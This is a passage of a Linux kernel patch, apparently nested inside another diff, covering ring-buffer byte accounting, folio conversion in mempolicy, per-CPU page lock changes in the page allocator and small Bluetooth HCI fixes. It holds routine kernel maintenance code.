+-	return local_read(&bpage->page->commit);
+-}
+-
+ static struct ring_buffer_event *
+ rb_iter_head_event(struct ring_buffer_iter *iter)
+ {
+@@ -2518,7 +2514,7 @@ rb_handle_head_page(struct ring_buffer_per_cpu *cpu_buffer,
+ 		 * the counters.
+ 		 */
+ 		local_add(entries, &cpu_buffer->overrun);
+-		local_sub(BUF_PAGE_SIZE, &cpu_buffer->entries_bytes);
++		local_sub(rb_page_commit(next_page), &cpu_buffer->entries_bytes);
+ 		local_inc(&cpu_buffer->pages_lost);
+ 
+ 		/*
+@@ -2661,9 +2657,6 @@ rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
+ 
+ 	event = __rb_page_index(tail_page, tail);
+ 
+-	/* account for padding bytes */
+-	local_add(BUF_PAGE_SIZE - tail, &cpu_buffer->entries_bytes);
+-
+ 	/*
+ 	 * Save the original length to the meta data.
+ 	 * This will be used by the reader to add lost event
+@@ -2677,7 +2670,8 @@ rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
+ 	 * write counter enough to allow another writer to slip
+ 	 * in on this page.
+ 	 * We put in a discarded commit instead, to make sure
+-	 * that this space is not used again.
++	 * that this space is not used again, and this space will
++	 * not be accounted into 'entries_bytes'.
+ 	 *
+ 	 * If we are less than the minimum size, we don't need to
+ 	 * worry about it.
+@@ -2702,6 +2696,9 @@ rb_reset_tail(struct ring_buffer_per_cpu *cpu_buffer,
+ 	/* time delta must be non zero */
+ 	event->time_delta = 1;
+ 
++	/* account for padding bytes */
++	local_add(BUF_PAGE_SIZE - tail, &cpu_buffer->entries_bytes);
++
+ 	/* Make sure the padding is visible before the tail_page->write update */
+ 	smp_wmb();
+ 
+@@ -4219,7 +4216,7 @@ u64 ring_buffer_oldest_event_ts(struct trace_buffer *buffer, int cpu)
+ EXPORT_SYMBOL_GPL(ring_buffer_oldest_event_ts);
+ 
+ /**
+- * ring_buffer_bytes_cpu - get the number of bytes consumed in a cpu buffer
++ * ring_buffer_bytes_cpu - get the number of bytes unconsumed in a cpu buffer
+  * @buffer: The ring buffer
+  * @cpu: The per CPU buffer to read from.
+  */
+@@ -4729,6 +4726,7 @@ static void rb_advance_reader(struct ring_buffer_per_cpu *cpu_buffer)
+ 
+ 	length = rb_event_length(event);
+ 	cpu_buffer->reader_page->read += length;
++	cpu_buffer->read_bytes += length;
+ }
+ 
+ static void rb_advance_iter(struct ring_buffer_iter *iter)
+@@ -5824,7 +5822,7 @@ int ring_buffer_read_page(struct trace_buffer *buffer,
+ 	} else {
+ 		/* update the entry counter */
+ 		cpu_buffer->read += rb_page_entries(reader);
+-		cpu_buffer->read_bytes += BUF_PAGE_SIZE;
++		cpu_buffer->read_bytes += rb_page_commit(reader);
+ 
+ 		/* swap the pages */
+ 		rb_init_page(bpage);
+diff --git a/mm/memory.c b/mm/memory.c
+index 2083078cd0615..0d1b3ee8fcd7a 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -672,6 +672,16 @@ out:
+ 	return pfn_to_page(pfn);
+ }
+ 
++struct folio *vm_normal_folio(struct vm_area_struct *vma, unsigned long addr,
++			    pte_t pte)
++{
++	struct page *page = vm_normal_page(vma, addr, pte);
++
++	if (page)
++		return page_folio(page);
++	return NULL;
++}
++
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ struct page *vm_normal_page_pmd(struct vm_area_struct *vma, unsigned long addr,
+ 				pmd_t pmd)
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 7d36dd95d1fff..bfe2d1d50fbee 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -414,7 +414,7 @@ static const struct mempolicy_operations mpol_ops[MPOL_MAX] = {
+ 	},
+ };
+ 
+-static int migrate_page_add(struct page *page, struct list_head *pagelist,
++static int migrate_folio_add(struct folio *folio, struct list_head *foliolist,
+ 				unsigned long flags);
+ 
+ struct queue_pages {
+@@ -424,6 +424,7 @@ struct queue_pages {
+ 	unsigned long start;
+ 	unsigned long end;
+ 	struct vm_area_struct *first;
++	bool has_unmovable;
+ };
+ 
+ /*
+@@ -442,21 +443,20 @@ static inline bool queue_pages_required(struct page *page,
+ }
+ 
+ /*
+- * queue_pages_pmd() has three possible return values:
+- * 0 - pages are placed on the right node or queued successfully, or
+- *     special page is met, i.e. huge zero page.
+- * 1 - there is unmovable page, and MPOL_MF_MOVE* & MPOL_MF_STRICT were
+- *     specified.
++ * queue_folios_pmd() has three possible return values:
++ * 0 - folios are placed on the right node or queued successfully, or
++ *     special page is met, i.e. zero page, or unmovable page is found
++ *     but continue walking (indicated by queue_pages.has_unmovable).
+  * -EIO - is migration entry or only MPOL_MF_STRICT was specified and an
+- *        existing page was already on a node that does not follow the
++ *        existing folio was already on a node that does not follow the
+  *        policy.
+  */
+-static int queue_pages_pmd(pmd_t *pmd, spinlock_t *ptl, unsigned long addr,
++static int queue_folios_pmd(pmd_t *pmd, spinlock_t *ptl, unsigned long addr,
+ 				unsigned long end, struct mm_walk *walk)
+ 	__releases(ptl)
+ {
+ 	int ret = 0;
+-	struct page *page;
++	struct folio *folio;
+ 	struct queue_pages *qp = walk->private;
+ 	unsigned long flags;
+ 
+@@ -464,20 +464,20 @@ static int queue_pages_pmd(pmd_t *pmd, spinlock_t *ptl, unsigned long addr,
+ 		ret = -EIO;
+ 		goto unlock;
+ 	}
+-	page = pmd_page(*pmd);
+-	if (is_huge_zero_page(page)) {
++	folio = pfn_folio(pmd_pfn(*pmd));
++	if (is_huge_zero_page(&folio->page)) {
+ 		walk->action = ACTION_CONTINUE;
+ 		goto unlock;
+ 	}
+-	if (!queue_pages_required(page, qp))
++	if (!queue_pages_required(&folio->page, qp))
+ 		goto unlock;
+ 
+ 	flags = qp->flags;
+-	/* go to thp migration */
++	/* go to folio migration */
+ 	if (flags & (MPOL_MF_MOVE | MPOL_MF_MOVE_ALL)) {
+ 		if (!vma_migratable(walk->vma) ||
+-		    migrate_page_add(page, qp->pagelist, flags)) {
+-			ret = 1;
++		    migrate_folio_add(folio, qp->pagelist, flags)) {
++			qp->has_unmovable = true;
+ 			goto unlock;
+ 		}
+ 	} else
+@@ -491,28 +491,26 @@ unlock:
+  * Scan through pages checking if pages follow certain conditions,
+  * and move them to the pagelist if they do.
+  *
+- * queue_pages_pte_range() has three possible return values:
+- * 0 - pages are placed on the right node or queued successfully, or
+- *     special page is met, i.e. zero page.
+- * 1 - there is unmovable page, and MPOL_MF_MOVE* & MPOL_MF_STRICT were
+- *     specified.
+- * -EIO - only MPOL_MF_STRICT was specified and an existing page was already
++ * queue_folios_pte_range() has three possible return values:
++ * 0 - folios are placed on the right node or queued successfully, or
++ *     special page is met, i.e. zero page, or unmovable page is found
++ *     but continue walking (indicated by queue_pages.has_unmovable).
++ * -EIO - only MPOL_MF_STRICT was specified and an existing folio was already
+  *        on a node that does not follow the policy.
+  */
+-static int queue_pages_pte_range(pmd_t *pmd, unsigned long addr,
++static int queue_folios_pte_range(pmd_t *pmd, unsigned long addr,
+ 			unsigned long end, struct mm_walk *walk)
+ {
+ 	struct vm_area_struct *vma = walk->vma;
+-	struct page *page;
++	struct folio *folio;
+ 	struct queue_pages *qp = walk->private;
+ 	unsigned long flags = qp->flags;
+-	bool has_unmovable = false;
+ 	pte_t *pte, *mapped_pte;
+ 	spinlock_t *ptl;
+ 
+ 	ptl = pmd_trans_huge_lock(pmd, vma);
+ 	if (ptl)
+-		return queue_pages_pmd(pmd, ptl, addr, end, walk);
++		return queue_folios_pmd(pmd, ptl, addr, end, walk);
+ 
+ 	if (pmd_trans_unstable(pmd))
+ 		return 0;
+@@ -521,40 +519,38 @@ static int queue_pages_pte_range(pmd_t *pmd, unsigned long addr,
+ 	for (; addr != end; pte++, addr += PAGE_SIZE) {
+ 		if (!pte_present(*pte))
+ 			continue;
+-		page = vm_normal_page(vma, addr, *pte);
+-		if (!page || is_zone_device_page(page))
++		folio = vm_normal_folio(vma, addr, *pte);
++		if (!folio || folio_is_zone_device(folio))
+ 			continue;
+ 		/*
+-		 * vm_normal_page() filters out zero pages, but there might
+-		 * still be PageReserved pages to skip, perhaps in a VDSO.
++		 * vm_normal_folio() filters out zero pages, but there might
++		 * still be reserved folios to skip, perhaps in a VDSO.
+ 		 */
+-		if (PageReserved(page))
++		if (folio_test_reserved(folio))
+ 			continue;
+-		if (!queue_pages_required(page, qp))
++		if (!queue_pages_required(&folio->page, qp))
+ 			continue;
+ 		if (flags & (MPOL_MF_MOVE | MPOL_MF_MOVE_ALL)) {
+-			/* MPOL_MF_STRICT must be specified if we get here */
+-			if (!vma_migratable(vma)) {
+-				has_unmovable = true;
+-				break;
+-			}
++			/*
++			 * MPOL_MF_STRICT must be specified if we get here.
++			 * Continue walking vmas due to MPOL_MF_MOVE* flags.
++			 */
++			if (!vma_migratable(vma))
++				qp->has_unmovable = true;
+ 
+ 			/*
+ 			 * Do not abort immediately since there may be
+ 			 * temporary off LRU pages in the range.  Still
+ 			 * need migrate other LRU pages.
+ 			 */
+-			if (migrate_page_add(page, qp->pagelist, flags))
+-				has_unmovable = true;
++			if (migrate_folio_add(folio, qp->pagelist, flags))
++				qp->has_unmovable = true;
+ 		} else
+ 			break;
+ 	}
+ 	pte_unmap_unlock(mapped_pte, ptl);
+ 	cond_resched();
+ 
+-	if (has_unmovable)
+-		return 1;
+-
+ 	return addr != end ? -EIO : 0;
+ }
+ 
+@@ -594,7 +590,7 @@ static int queue_pages_hugetlb(pte_t *pte, unsigned long hmask,
+ 		 * Detecting misplaced page but allow migrating pages which
+ 		 * have been queued.
+ 		 */
+-		ret = 1;
++		qp->has_unmovable = true;
+ 		goto unlock;
+ 	}
+ 
+@@ -608,7 +604,7 @@ static int queue_pages_hugetlb(pte_t *pte, unsigned long hmask,
+ 			 * Failed to isolate page but allow migrating pages
+ 			 * which have been queued.
+ 			 */
+-			ret = 1;
++			qp->has_unmovable = true;
+ 	}
+ unlock:
+ 	spin_unlock(ptl);
+@@ -705,7 +701,7 @@ static int queue_pages_test_walk(unsigned long start, unsigned long end,
+ 
+ static const struct mm_walk_ops queue_pages_walk_ops = {
+ 	.hugetlb_entry		= queue_pages_hugetlb,
+-	.pmd_entry		= queue_pages_pte_range,
++	.pmd_entry		= queue_folios_pte_range,
+ 	.test_walk		= queue_pages_test_walk,
+ };
+ 
+@@ -737,10 +733,13 @@ queue_pages_range(struct mm_struct *mm, unsigned long start, unsigned long end,
+ 		.start = start,
+ 		.end = end,
+ 		.first = NULL,
++		.has_unmovable = false,
+ 	};
+ 
+ 	err = walk_page_range(mm, start, end, &queue_pages_walk_ops, &qp);
+ 
++	if (qp.has_unmovable)
++		err = 1;
+ 	if (!qp.first)
+ 		/* whole range in hole */
+ 		err = -EFAULT;
+@@ -1012,27 +1011,28 @@ static long do_get_mempolicy(int *policy, nodemask_t *nmask,
+ }
+ 
+ #ifdef CONFIG_MIGRATION
+-/*
+- * page migration, thp tail pages can be passed.
+- */
+-static int migrate_page_add(struct page *page, struct list_head *pagelist,
++static int migrate_folio_add(struct folio *folio, struct list_head *foliolist,
+ 				unsigned long flags)
+ {
+-	struct page *head = compound_head(page);
+ 	/*
+-	 * Avoid migrating a page that is shared with others.
++	 * We try to migrate only unshared folios. If it is shared it
++	 * is likely not worth migrating.
++	 *
++	 * To check if the folio is shared, ideally we want to make sure
++	 * every page is mapped to the same process. Doing that is very
++	 * expensive, so check the estimated mapcount of the folio instead.
+ 	 */
+-	if ((flags & MPOL_MF_MOVE_ALL) || page_mapcount(head) == 1) {
+-		if (!isolate_lru_page(head)) {
+-			list_add_tail(&head->lru, pagelist);
+-			mod_node_page_state(page_pgdat(head),
+-				NR_ISOLATED_ANON + page_is_file_lru(head),
+-				thp_nr_pages(head));
++	if ((flags & MPOL_MF_MOVE_ALL) || folio_estimated_sharers(folio) == 1) {
++		if (!folio_isolate_lru(folio)) {
++			list_add_tail(&folio->lru, foliolist);
++			node_stat_mod_folio(folio,
++				NR_ISOLATED_ANON + folio_is_file_lru(folio),
++				folio_nr_pages(folio));
+ 		} else if (flags & MPOL_MF_STRICT) {
+ 			/*
+-			 * Non-movable page may reach here.  And, there may be
+-			 * temporary off LRU pages or non-LRU movable pages.
+-			 * Treat them as unmovable pages since they can't be
++			 * Non-movable folio may reach here.  And, there may be
++			 * temporary off LRU folios or non-LRU movable folios.
++			 * Treat them as unmovable folios since they can't be
+ 			 * isolated, so they can't be moved at the moment.  It
+ 			 * should return -EIO for this case too.
+ 			 */
+@@ -1224,7 +1224,7 @@ static struct page *new_page(struct page *page, unsigned long start)
+ }
+ #else
+ 
+-static int migrate_page_add(struct page *page, struct list_head *pagelist,
++static int migrate_folio_add(struct folio *folio, struct list_head *foliolist,
+ 				unsigned long flags)
+ {
+ 	return -EIO;
+@@ -1337,7 +1337,7 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 				putback_movable_pages(&pagelist);
+ 		}
+ 
+-		if ((ret > 0) || (nr_failed && (flags & MPOL_MF_STRICT)))
++		if (((ret > 0) || nr_failed) && (flags & MPOL_MF_STRICT))
+ 			err = -EIO;
+ 	} else {
+ up_out:
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 69668817fed37..ca017c6008b7c 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -170,21 +170,12 @@ static DEFINE_MUTEX(pcp_batch_high_lock);
+ 	_ret;								\
+ })
+ 
+-#define pcpu_spin_lock_irqsave(type, member, ptr, flags)		\
++#define pcpu_spin_trylock(type, member, ptr)				\
+ ({									\
+ 	type *_ret;							\
+ 	pcpu_task_pin();						\
+ 	_ret = this_cpu_ptr(ptr);					\
+-	spin_lock_irqsave(&_ret->member, flags);			\
+-	_ret;								\
+-})
+-
+-#define pcpu_spin_trylock_irqsave(type, member, ptr, flags)		\
+-({									\
+-	type *_ret;							\
+-	pcpu_task_pin();						\
+-	_ret = this_cpu_ptr(ptr);					\
+-	if (!spin_trylock_irqsave(&_ret->member, flags)) {		\
++	if (!spin_trylock(&_ret->member)) {				\
+ 		pcpu_task_unpin();					\
+ 		_ret = NULL;						\
+ 	}								\
+@@ -197,27 +188,16 @@ static DEFINE_MUTEX(pcp_batch_high_lock);
+ 	pcpu_task_unpin();						\
+ })
+ 
+-#define pcpu_spin_unlock_irqrestore(member, ptr, flags)			\
+-({									\
+-	spin_unlock_irqrestore(&ptr->member, flags);			\
+-	pcpu_task_unpin();						\
+-})
+-
+ /* struct per_cpu_pages specific helpers. */
+ #define pcp_spin_lock(ptr)						\
+ 	pcpu_spin_lock(struct per_cpu_pages, lock, ptr)
+ 
+-#define pcp_spin_lock_irqsave(ptr, flags)				\
+-	pcpu_spin_lock_irqsave(struct per_cpu_pages, lock, ptr, flags)
+-
+-#define pcp_spin_trylock_irqsave(ptr, flags)				\
+-	pcpu_spin_trylock_irqsave(struct per_cpu_pages, lock, ptr, flags)
++#define pcp_spin_trylock(ptr)						\
++	pcpu_spin_trylock(struct per_cpu_pages, lock, ptr)
+ 
+ #define pcp_spin_unlock(ptr)						\
+ 	pcpu_spin_unlock(lock, ptr)
+ 
+-#define pcp_spin_unlock_irqrestore(ptr, flags)				\
+-	pcpu_spin_unlock_irqrestore(lock, ptr, flags)
+ #ifdef CONFIG_USE_PERCPU_NUMA_NODE_ID
+ DEFINE_PER_CPU(int, numa_node);
+ EXPORT_PER_CPU_SYMBOL(numa_node);
+@@ -1548,6 +1528,7 @@ static void free_pcppages_bulk(struct zone *zone, int count,
+ 					struct per_cpu_pages *pcp,
+ 					int pindex)
+ {
++	unsigned long flags;
+ 	int min_pindex = 0;
+ 	int max_pindex = NR_PCP_LISTS - 1;
+ 	unsigned int order;
+@@ -1563,8 +1544,7 @@ static void free_pcppages_bulk(struct zone *zone, int count,
+ 	/* Ensure requested pindex is drained first. */
+ 	pindex = pindex - 1;
+ 
+-	/* Caller must hold IRQ-safe pcp->lock so IRQs are disabled. */
+-	spin_lock(&zone->lock);
++	spin_lock_irqsave(&zone->lock, flags);
+ 	isolated_pageblocks = has_isolate_pageblock(zone);
+ 
+ 	while (count > 0) {
+@@ -1612,7 +1592,7 @@ static void free_pcppages_bulk(struct zone *zone, int count,
+ 		} while (count > 0 && !list_empty(list));
+ 	}
+ 
+-	spin_unlock(&zone->lock);
++	spin_unlock_irqrestore(&zone->lock, flags);
+ }
+ 
+ static void free_one_page(struct zone *zone,
+@@ -3126,10 +3106,10 @@ static int rmqueue_bulk(struct zone *zone, unsigned int order,
+ 			unsigned long count, struct list_head *list,
+ 			int migratetype, unsigned int alloc_flags)
+ {
++	unsigned long flags;
+ 	int i, allocated = 0;
+ 
+-	/* Caller must hold IRQ-safe pcp->lock so IRQs are disabled. */
+-	spin_lock(&zone->lock);
++	spin_lock_irqsave(&zone->lock, flags);
+ 	for (i = 0; i < count; ++i) {
+ 		struct page *page = __rmqueue(zone, order, migratetype,
+ 								alloc_flags);
+@@ -3163,7 +3143,7 @@ static int rmqueue_bulk(struct zone *zone, unsigned int order,
+ 	 * pages added to the pcp list.
+ 	 */
+ 	__mod_zone_page_state(zone, NR_FREE_PAGES, -(i << order));
+-	spin_unlock(&zone->lock);
++	spin_unlock_irqrestore(&zone->lock, flags);
+ 	return allocated;
+ }
+ 
+@@ -3180,16 +3160,9 @@ void drain_zone_pages(struct zone *zone, struct per_cpu_pages *pcp)
+ 	batch = READ_ONCE(pcp->batch);
+ 	to_drain = min(pcp->count, batch);
+ 	if (to_drain > 0) {
+-		unsigned long flags;
+-
+-		/*
+-		 * free_pcppages_bulk expects IRQs disabled for zone->lock
+-		 * so even though pcp->lock is not intended to be IRQ-safe,
+-		 * it's needed in this context.
+-		 */
+-		spin_lock_irqsave(&pcp->lock, flags);
++		spin_lock(&pcp->lock);
+ 		free_pcppages_bulk(zone, to_drain, pcp, 0);
+-		spin_unlock_irqrestore(&pcp->lock, flags);
++		spin_unlock(&pcp->lock);
+ 	}
+ }
+ #endif
+@@ -3203,12 +3176,9 @@ static void drain_pages_zone(unsigned int cpu, struct zone *zone)
+ 
+ 	pcp = per_cpu_ptr(zone->per_cpu_pageset, cpu);
+ 	if (pcp->count) {
+-		unsigned long flags;
+-
+-		/* See drain_zone_pages on why this is disabling IRQs */
+-		spin_lock_irqsave(&pcp->lock, flags);
++		spin_lock(&pcp->lock);
+ 		free_pcppages_bulk(zone, pcp->count, pcp, 0);
+-		spin_unlock_irqrestore(&pcp->lock, flags);
++		spin_unlock(&pcp->lock);
+ 	}
+ }
+ 
+@@ -3474,12 +3444,11 @@ static void free_unref_page_commit(struct zone *zone, struct per_cpu_pages *pcp,
+  */
+ void free_unref_page(struct page *page, unsigned int order)
+ {
+-	unsigned long flags;
+ 	unsigned long __maybe_unused UP_flags;
+ 	struct per_cpu_pages *pcp;
+ 	struct zone *zone;
+ 	unsigned long pfn = page_to_pfn(page);
+-	int migratetype;
++	int migratetype, pcpmigratetype;
+ 
+ 	if (!free_unref_page_prepare(page, pfn, order))
+ 		return;
+@@ -3487,25 +3456,25 @@ void free_unref_page(struct page *page, unsigned int order)
+ 	/*
+ 	 * We only track unmovable, reclaimable and movable on pcp lists.
+ 	 * Place ISOLATE pages on the isolated list because they are being
+-	 * offlined but treat HIGHATOMIC as movable pages so we can get those
+-	 * areas back if necessary. Otherwise, we may have to free
++	 * offlined but treat HIGHATOMIC and CMA as movable pages so we can
++	 * get those areas back if necessary. Otherwise, we may have to free
+ 	 * excessively into the page allocator
+ 	 */
+-	migratetype = get_pcppage_migratetype(page);
++	migratetype = pcpmigratetype = get_pcppage_migratetype(page);
+ 	if (unlikely(migratetype >= MIGRATE_PCPTYPES)) {
+ 		if (unlikely(is_migrate_isolate(migratetype))) {
+ 			free_one_page(page_zone(page), page, pfn, order, migratetype, FPI_NONE);
+ 			return;
+ 		}
+-		migratetype = MIGRATE_MOVABLE;
++		pcpmigratetype = MIGRATE_MOVABLE;
+ 	}
+ 
+ 	zone = page_zone(page);
+ 	pcp_trylock_prepare(UP_flags);
+-	pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
++	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+ 	if (pcp) {
+-		free_unref_page_commit(zone, pcp, page, migratetype, order);
+-		pcp_spin_unlock_irqrestore(pcp, flags);
++		free_unref_page_commit(zone, pcp, page, pcpmigratetype, order);
++		pcp_spin_unlock(pcp);
+ 	} else {
+ 		free_one_page(zone, page, pfn, order, migratetype, FPI_NONE);
+ 	}
+@@ -3517,10 +3486,10 @@ void free_unref_page(struct page *page, unsigned int order)
+  */
+ void free_unref_page_list(struct list_head *list)
+ {
++	unsigned long __maybe_unused UP_flags;
+ 	struct page *page, *next;
+ 	struct per_cpu_pages *pcp = NULL;
+ 	struct zone *locked_zone = NULL;
+-	unsigned long flags;
+ 	int batch_count = 0;
+ 	int migratetype;
+ 
+@@ -3547,20 +3516,37 @@ void free_unref_page_list(struct list_head *list)
+ 	list_for_each_entry_safe(page, next, list, lru) {
+ 		struct zone *zone = page_zone(page);
+ 
++		list_del(&page->lru);
++		migratetype = get_pcppage_migratetype(page);
++
+ 		/* Different zone, different pcp lock. */
+ 		if (zone != locked_zone) {
+-			if (pcp)
+-				pcp_spin_unlock_irqrestore(pcp, flags);
++			if (pcp) {
++				pcp_spin_unlock(pcp);
++				pcp_trylock_finish(UP_flags);
++			}
+ 
++			/*
++			 * trylock is necessary as pages may be getting freed
++			 * from IRQ or SoftIRQ context after an IO completion.
++			 */
++			pcp_trylock_prepare(UP_flags);
++			pcp = pcp_spin_trylock(zone->per_cpu_pageset);
++			if (unlikely(!pcp)) {
++				pcp_trylock_finish(UP_flags);
++				free_one_page(zone, page, page_to_pfn(page),
++					      0, migratetype, FPI_NONE);
++				locked_zone = NULL;
++				continue;
++			}
+ 			locked_zone = zone;
+-			pcp = pcp_spin_lock_irqsave(locked_zone->per_cpu_pageset, flags);
++			batch_count = 0;
+ 		}
+ 
+ 		/*
+ 		 * Non-isolated types over MIGRATE_PCPTYPES get added
+ 		 * to the MIGRATE_MOVABLE pcp list.
+ 		 */
+-		migratetype = get_pcppage_migratetype(page);
+ 		if (unlikely(migratetype >= MIGRATE_PCPTYPES))
+ 			migratetype = MIGRATE_MOVABLE;
+ 
+@@ -3568,18 +3554,23 @@ void free_unref_page_list(struct list_head *list)
+ 		free_unref_page_commit(zone, pcp, page, migratetype, 0);
+ 
+ 		/*
+-		 * Guard against excessive IRQ disabled times when we get
+-		 * a large list of pages to free.
++		 * Guard against excessive lock hold times when freeing
++		 * a large list of pages. Lock will be reacquired if
++		 * necessary on the next iteration.
+ 		 */
+ 		if (++batch_count == SWAP_CLUSTER_MAX) {
+-			pcp_spin_unlock_irqrestore(pcp, flags);
++			pcp_spin_unlock(pcp);
++			pcp_trylock_finish(UP_flags);
+ 			batch_count = 0;
+-			pcp = pcp_spin_lock_irqsave(locked_zone->per_cpu_pageset, flags);
++			pcp = NULL;
++			locked_zone = NULL;
+ 		}
+ 	}
+ 
+-	if (pcp)
+-		pcp_spin_unlock_irqrestore(pcp, flags);
++	if (pcp) {
++		pcp_spin_unlock(pcp);
++		pcp_trylock_finish(UP_flags);
++	}
+ }
+ 
+ /*
+@@ -3780,15 +3771,11 @@ static struct page *rmqueue_pcplist(struct zone *preferred_zone,
+ 	struct per_cpu_pages *pcp;
+ 	struct list_head *list;
+ 	struct page *page;
+-	unsigned long flags;
+ 	unsigned long __maybe_unused UP_flags;
+ 
+-	/*
+-	 * spin_trylock may fail due to a parallel drain. In the future, the
+-	 * trylock will also protect against IRQ reentrancy.
+-	 */
++	/* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */
+ 	pcp_trylock_prepare(UP_flags);
+-	pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
++	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+ 	if (!pcp) {
+ 		pcp_trylock_finish(UP_flags);
+ 		return NULL;
+@@ -3802,7 +3789,7 @@ static struct page *rmqueue_pcplist(struct zone *preferred_zone,
+ 	pcp->free_factor >>= 1;
+ 	list = &pcp->lists[order_to_pindex(migratetype, order)];
+ 	page = __rmqueue_pcplist(zone, order, migratetype, alloc_flags, pcp, list);
+-	pcp_spin_unlock_irqrestore(pcp, flags);
++	pcp_spin_unlock(pcp);
+ 	pcp_trylock_finish(UP_flags);
+ 	if (page) {
+ 		__count_zid_vm_events(PGALLOC, page_zonenum(page), 1 << order);
+@@ -5373,7 +5360,6 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 			struct page **page_array)
+ {
+ 	struct page *page;
+-	unsigned long flags;
+ 	unsigned long __maybe_unused UP_flags;
+ 	struct zone *zone;
+ 	struct zoneref *z;
+@@ -5455,9 +5441,9 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 	if (unlikely(!zone))
+ 		goto failed;
+ 
+-	/* Is a parallel drain in progress? */
++	/* spin_trylock may fail due to a parallel drain or IRQ reentrancy. */
+ 	pcp_trylock_prepare(UP_flags);
+-	pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
++	pcp = pcp_spin_trylock(zone->per_cpu_pageset);
+ 	if (!pcp)
+ 		goto failed_irq;
+ 
+@@ -5476,7 +5462,7 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 		if (unlikely(!page)) {
+ 			/* Try and allocate at least one page */
+ 			if (!nr_account) {
+-				pcp_spin_unlock_irqrestore(pcp, flags);
++				pcp_spin_unlock(pcp);
+ 				goto failed_irq;
+ 			}
+ 			break;
+@@ -5491,7 +5477,7 @@ unsigned long __alloc_pages_bulk(gfp_t gfp, int preferred_nid,
+ 		nr_populated++;
+ 	}
+ 
+-	pcp_spin_unlock_irqrestore(pcp, flags);
++	pcp_spin_unlock(pcp);
+ 	pcp_trylock_finish(UP_flags);
+ 
+ 	__count_zid_vm_events(PGALLOC, zone_idx(zone), nr_account);
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index fa4dd5fab0d44..d13b498f148cc 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2783,6 +2783,7 @@ void hci_release_dev(struct hci_dev *hdev)
+ 	hci_conn_params_clear_all(hdev);
+ 	hci_discovery_filter_clear(hdev);
+ 	hci_blocked_keys_clear(hdev);
++	hci_codec_list_clear(&hdev->local_codecs);
+ 	hci_dev_unlock(hdev);
+ 
+ 	ida_simple_remove(&hci_index_ida, hdev->id);
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 83eaf25ece465..e4d8857716eb7 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -32,6 +32,7 @@
+ 
+ #include "hci_request.h"
+ #include "hci_debugfs.h"
++#include "hci_codec.h"
+ #include "a2mp.h"
+ #include "amp.h"
+ #include "smp.h"
+diff --git a/net/bluetooth/hci_request.h b/net/bluetooth/hci_request.h
+index b9c5a98238374..0be75cf0efed8 100644
+--- a/net/bluetooth/hci_request.h
++++ b/net/bluetooth/hci_request.h
+@@ -71,7 +71,5 @@ struct sk_buff *hci_prepare_cmd(struct hci_dev *hdev, u16 opcode, u32 plen,
+ void hci_req_add_le_scan_disable(struct hci_request *req, bool rpa_le_conn);
+ void hci_req_add_le_passive_scan(struct hci_request *req);
+ 
+-void hci_req_prepare_suspend(struct hci_dev *hdev, enum suspended_state next);
+-
+ void hci_request_setup(struct hci_dev *hdev);
+ void hci_request_cancel_all(struct hci_dev *hdev);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 2ae038dfc39f7..5218c4dfe0a89 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -412,11 +412,6 @@ static int hci_le_scan_restart_sync(struct hci_dev *hdev)
+ 					   LE_SCAN_FILTER_DUP_ENABLE);
+ }
+ 
+-static int le_scan_restart_sync(struct hci_dev *hdev, void *data)
+-{
+-	return hci_le_scan_restart_sync(hdev);
+-}
+-
+ static void le_scan_restart(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev,
+@@ -426,15 +421,15 @@ static void le_scan_restart(struct work_struct *work)
+ 
+ 	bt_dev_dbg(hdev, "");
+ 
+-	hci_dev_lock(hdev);
+-
+-	status = hci_cmd_sync_queue(hdev, le_scan_restart_sync, NULL, NULL);
++	status = hci_le_scan_restart_sync(hdev);
+ 	if (status) {
+ 		bt_dev_err(hdev, "failed to restart LE scan: status %d",
+ 			   status);
+-		goto unlock;
++		return;
+ 	}
+ 
++	hci_dev_lock(hdev);
++
+ 	if (!test_bit(HCI_QUIRK_STRICT_DUPLICATE_FILTER, &hdev->quirks) ||
+ 	    !hdev->discovery.scan_start)
+ 		goto unlock;
+@@ -5033,6 +5028,7 @@ int hci_dev_close_sync(struct hci_dev *hdev)
+ 	memset(hdev->eir, 0, sizeof(hdev->eir));
+ 	memset(hdev->dev_class, 0, sizeof(hdev->dev_class));
+ 	bacpy(&hdev->random_addr, BDADDR_ANY);
++	hci_codec_list_clear(&hdev->local_codecs);
+ 
+ 	hci_dev_put(hdev);
+ 	return err;
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 5cd2e775915be..91e990accbf20 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -458,7 +458,7 @@ drop:
+ }
+ 
+ /* -------- Socket interface ---------- */
+-static struct sock *__iso_get_sock_listen_by_addr(bdaddr_t *ba)
++static struct sock *__iso_get_sock_listen_by_addr(bdaddr_t *src, bdaddr_t *dst)
+ {
+ 	struct sock *sk;
+ 
